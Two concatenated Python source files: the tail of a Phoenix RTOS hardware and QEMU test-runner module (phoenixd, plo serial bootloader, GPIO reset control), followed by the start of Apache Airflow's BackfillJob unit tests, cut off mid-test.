self.proc = None
self.reader_thread = None
self.wait_dispatcher = wait_dispatcher
self.dispatcher_event = None
self.output_buffer = ''
def _reader(self):
""" This method is intended to be run as a separated thread. It reads output of proc
line by line and saves it in the output_buffer. Additionally, if wait_dispatcher is true,
it searches for a line stating that message dispatcher has started """
while True:
line = self.proc.readline()
if not line:
break
if self.wait_dispatcher and not self.dispatcher_event.is_set():
msg = f'Starting message dispatcher on [{self.port}] (speed={self.baudrate})'
if msg in line:
self.dispatcher_event.set()
self.output_buffer += line
def run(self):
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'phoenixd',
['-p', self.port,
'-b', str(self.baudrate),
'-s', self.dir],
cwd=self.cwd,
encoding='utf-8'
)
self.dispatcher_event = threading.Event()
self.reader_thread = threading.Thread(target=self._reader)
self.reader_thread.start()
if self.wait_dispatcher:
# Reader thread will notify us that message dispatcher has just started
dispatcher_ready = self.dispatcher_event.wait(timeout=5)
if not dispatcher_ready:
self.kill()
msg = 'message dispatcher did not start!'
raise PhoenixdError(msg)
return self.proc
def output(self):
output = self.output_buffer
if is_github_actions():
            output = '::group::Phoenixd\n' + output + '::endgroup::\n'
return output
def kill(self):
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)
self.reader_thread.join(timeout=10)
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGKILL)
def __enter__(self):
self.run()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.kill()
class PloError(Exception):
def __init__(self, message, expected):
msg = Color.colorify("PLO ERROR:\n", Color.BOLD)
msg += str(message) + '\n'
if expected:
msg += Color.colorify("EXPECTED:\n", Color.BOLD)
msg += str(expected) + '\n'
super().__init__(msg)
class PloTalker:
"""Interface to communicate with plo"""
def __init__(self, port, baudrate=115200):
self.port = port
self.baudrate = baudrate
self.serial = None
self.plo = None
@classmethod
def from_pexpect(cls, pexpect_fd):
""" PloTalker can be created by passing pexpect spawn object directly.
User should handle port and process by himself. """
obj = cls(port=None)
obj.plo = pexpect_fd
return obj
def open(self):
try:
self.serial = serial.Serial(self.port, baudrate=self.baudrate)
except serial.SerialException:
logging.error(f'Port {self.port} not available\n')
raise
try:
self.plo = pexpect.fdpexpect.fdspawn(self.serial, timeout=8)
except Exception:
self.serial.close()
raise
return self
def close(self):
self.serial.close()
def __enter__(self):
return self.open()
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def wait_prompt(self, timeout=8):
self.plo.expect_exact("(plo)% ", timeout=timeout)
def expect_prompt(self, timeout=8):
idx = self.plo.expect([r"\(plo\)% ", r"(.*?)\n"], timeout=timeout)
if idx == 1:
# Something else than prompt was printed, raise error
line = self.plo.match.group(0)
raise PloError(line, expected="(plo)% ")
def cmd(self, cmd, timeout=8):
self.plo.send(cmd + '\r\n')
        # Wait for the echoed command
self.plo.expect_exact(cmd)
# There might be some ASCII escape characters, we wait only for a new line
self.plo.expect_exact('\n', timeout=timeout)
def app(self, device, file, imap, dmap, exec=False):
exec = '-x' if exec else ''
self.cmd(f'app {device} {exec} {file} {imap} {dmap}', timeout=30)
self.expect_prompt()
def copy(self, src, src_obj, dst, dst_obj, src_size='', dst_size=''):
self.cmd(f'copy {src} {src_obj} {src_size} {dst} {dst_obj} {dst_size}', timeout=60)
self.expect_prompt()
def copy_file2mem(self, src, file, dst='flash1', off=0, size=0):
self.copy(
src=src,
src_obj=file,
dst=dst,
dst_obj=off,
dst_size=size
)
def go(self):
self.plo.send('go!\r\n')
class Runner:
"""Common interface for test runners"""
def flash(self):
"""Method used for flashing a device with the image containing tests."""
pass
def run(self, test):
"""Method used for running a single test case which is represented by TestCase class."""
pass
class DeviceRunner(Runner):
"""This class provides interface to run test case using serial port"""
def __init__(self, port):
self.port = port
self.serial = None
def run(self, test):
if test.skipped():
return
try:
self.serial = serial.Serial(self.port, baudrate=115200)
except serial.SerialException:
test.handle_exception()
return
proc = pexpect.fdpexpect.fdspawn(self.serial, encoding='utf-8', timeout=test.timeout)
try:
PloTalker.from_pexpect(proc).go()
test.handle(proc)
finally:
self.serial.close()
class GPIO:
"""Wrapper around the RPi.GPIO module. It represents a single OUT pin"""
def __init__(self, pin):
self.pin = pin
self.gpio = importlib.import_module('RPi.GPIO')
self.gpio.setmode(self.gpio.BCM)
self.gpio.setwarnings(False)
self.gpio.setup(self.pin, self.gpio.OUT)
def high(self):
self.gpio.output(self.pin, self.gpio.HIGH)
def low(self):
self.gpio.output(self.pin, self.gpio.LOW)
class IMXRT106xRunner(DeviceRunner):
"""This class provides interface to run test case on IMXRT106x using RaspberryPi.
GPIO 17 must be connected to the JTAG_nSRST (j21-15) (using an additional resistor 1,5k).
GPIO 4 must be connected to the SW7-3 (using a resistor 4,3k)."""
SDP = 'plo-ram-armv7m7-imxrt106x.sdp'
IMAGE = 'phoenix-armv7m7-imxrt106x.disk'
def __init__(
self,
port,
phoenixd_port='/dev/serial/by-id/usb-Phoenix_Systems_plo_CDC_ACM-if00'
):
super().__init__(port)
self.phoenixd_port = phoenixd_port
self.reset_gpio = GPIO(17)
self.reset_gpio.high()
self.boot_gpio = GPIO(4)
def reset(self):
self.reset_gpio.low()
time.sleep(0.050)
self.reset_gpio.high()
def boot(self, serial_downloader=False):
if serial_downloader:
self.boot_gpio.low()
else:
self.boot_gpio.high()
self.reset()
def flash(self):
self.boot(serial_downloader=True)
Psu(script=self.SDP).run()
phd = None
try:
with PloTalker(self.port) as plo:
plo.wait_prompt()
# FIXME We should wait for usb0 dev
time.sleep(1)
with Phoenixd(self.phoenixd_port) as phd:
plo.copy_file2mem(
src='usb0',
file=self.IMAGE,
dst='flash1',
off=0
)
except (TIMEOUT, EOF, PloError, PhoenixdError) as exc:
exception = f'{exc}\n'
if phd:
exception = phd_error_msg(exception, phd.output())
logging.info(exception)
sys.exit(1)
self.boot()
def load(self, test):
"""Loads test ELF into syspage using plo"""
phd = None
load_dir = 'test/armv7m7-imxrt106x'
try:
with PloTalker(self.port) as plo:
self.boot()
plo.wait_prompt()
if not test.exec_cmd:
# We got plo prompt, we are ready for sending the "go!" command.
return True
with Phoenixd(self.phoenixd_port, dir=load_dir) as phd:
plo.app('usb0', test.exec_cmd[0], 'ocram2', 'ocram2')
except (TIMEOUT, EOF, PloError, PhoenixdError) as exc:
if isinstance(exc, PloError) or isinstance(exc, PhoenixdError):
test.exception = str(exc)
test.fail()
else: # TIMEOUT or EOF
test.exception = Color.colorify('EXCEPTION PLO\n', Color.BOLD)
test.handle_pyexpect_error(plo.plo, exc)
if phd:
test.exception = phd_error_msg(test.exception, phd.output())
return False
return True
def run(self, test):
if test.skipped():
return
if not self.load(test):
return
super().run(test)
class QemuRunner(Runner):
"""This class provides interface to run test case using QEMU as a device."""
def __init__(self, qemu, args):
self.qemu = qemu
self.args = args
def run(self, test):
if test.skipped():
return
proc = pexpect.spawn(self.qemu, args=self.args, encoding='utf-8', timeout=test.timeout)
try:
test.handle(proc)
finally:
proc.kill(signal.SIGTERM)
class HostRunner(Runner):
"""This class provides interface to run test case using host as a device."""
def run(self, test):
if test.skipped():
return
test_bin = PHRTOS_PROJECT_DIR / '_boot' / test.target / test.exec_cmd[0]
try:
proc = pexpect.spawn(
str(test_bin),
args=test.exec_cmd[1:],
encoding='utf-8',
timeout=test.timeout
)
except pexpect.exceptions.ExceptionPexpect:
test.handle_exception()
return
try:
test.handle(proc, psh=False)
finally:
proc.kill(signal.SIGTERM)
class RunnerFactory:
@staticmethod
def create(target):
if target == 'ia32-generic':
return QemuRunner(*QEMU_CMD[target])
if target == 'host-pc':
return HostRunner()
if target == 'armv7m7-imxrt106x':
return IMXRT106xRunner(DEVICE_SERIAL)
raise ValueError(f"Unknown Runner target: {target}")
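# Typical use of the factory (a sketch under assumptions -- `campaign` stands in
# for whatever iterable of test-case objects the surrounding harness provides):
#
#   runner = RunnerFactory.create('ia32-generic')
#   runner.flash()            # no-op for the QEMU and host runners
#   for test in campaign:
#       runner.run(test)      # each test exposes skipped(), timeout, handle(), ...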
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from tests.compat import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.exceptions import DagConcurrencyLimitReached, NoAvailablePoolSlot
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors, SlaMiss
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.test_utils.db import clear_db_runs, clear_db_pools, clear_db_dags, \
clear_db_sla_miss, clear_db_errors
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
from tests.compat import mock
configuration.load_test_config()
logger = logging.getLogger(__name__)
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
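# For illustration only: an ad-hoc DAG file with the contents above could be
# materialized like this (a sketch, not something this module executes):
#
#   with open(os.path.join(TEST_DAGS_FOLDER, TEMP_DAG_FILENAME), 'w') as dag_file:
#       dag_file.write(PARSEABLE_DAG_FILE_CONTENTS)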
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def _get_dummy_dag(self, dag_id, pool=None):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
pool=pool,
dag=dag)
dag.clear()
return dag
def _times_called_with(self, method, class_):
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
def setUp(self):
clear_db_runs()
clear_db_pools()
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
        Try to backfill some of the example dags. Be careful: not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = self._get_dummy_dag('test_backfill_conf')
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_concurrency_limit(self, mock_log):
dag = self._get_dummy_dag('test_backfill_respect_concurrency_limit')
dag.concurrency = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), dag.concurrency)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.concurrency:
concurrency_limit_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(concurrency_limit_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_pool_limit_reached_in_debug)
self.assertGreater(times_concurrency_limit_reached_in_debug, 0)
@patch('airflow.jobs.LoggingMixin.log')
@patch('airflow.jobs.conf.getint')
def test_backfill_with_no_pool_limit(self, mock_getint, mock_log):
non_pooled_backfill_task_slot_count = 2
def getint(section, key):
if section.lower() == 'core' and \
'non_pooled_backfill_task_slot_count' == key.lower():
return non_pooled_backfill_task_slot_count
else:
return configuration.conf.getint(section, key)
mock_getint.side_effect = getint
dag = self._get_dummy_dag('test_backfill_with_no_pool_limit')
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
non_pooled_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
# if no pool is specified, the number of tasks running in
# parallel per backfill should be less than
# non_pooled_backfill_task_slot_count at any point of time.
for running_task_instances in executor.history:
self.assertLessEqual(
len(running_task_instances),
non_pooled_backfill_task_slot_count,
)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == non_pooled_backfill_task_slot_count:
non_pooled_task_slot_count_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(non_pooled_task_slot_count_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_pool_not_found(self):
dag = self._get_dummy_dag(
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
self.fail()
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_pool_limit(self, mock_log):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), slots)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(pool_was_full_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
        # check that the order is right. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
start_date.isoformat(),
'-e',
end_date.isoformat(),
'-I'
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
self.assertRaisesRegexp(
AirflowException,
expected_msg,
cli.backfill,
self.parser.parse_args(args + ['-B']))
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
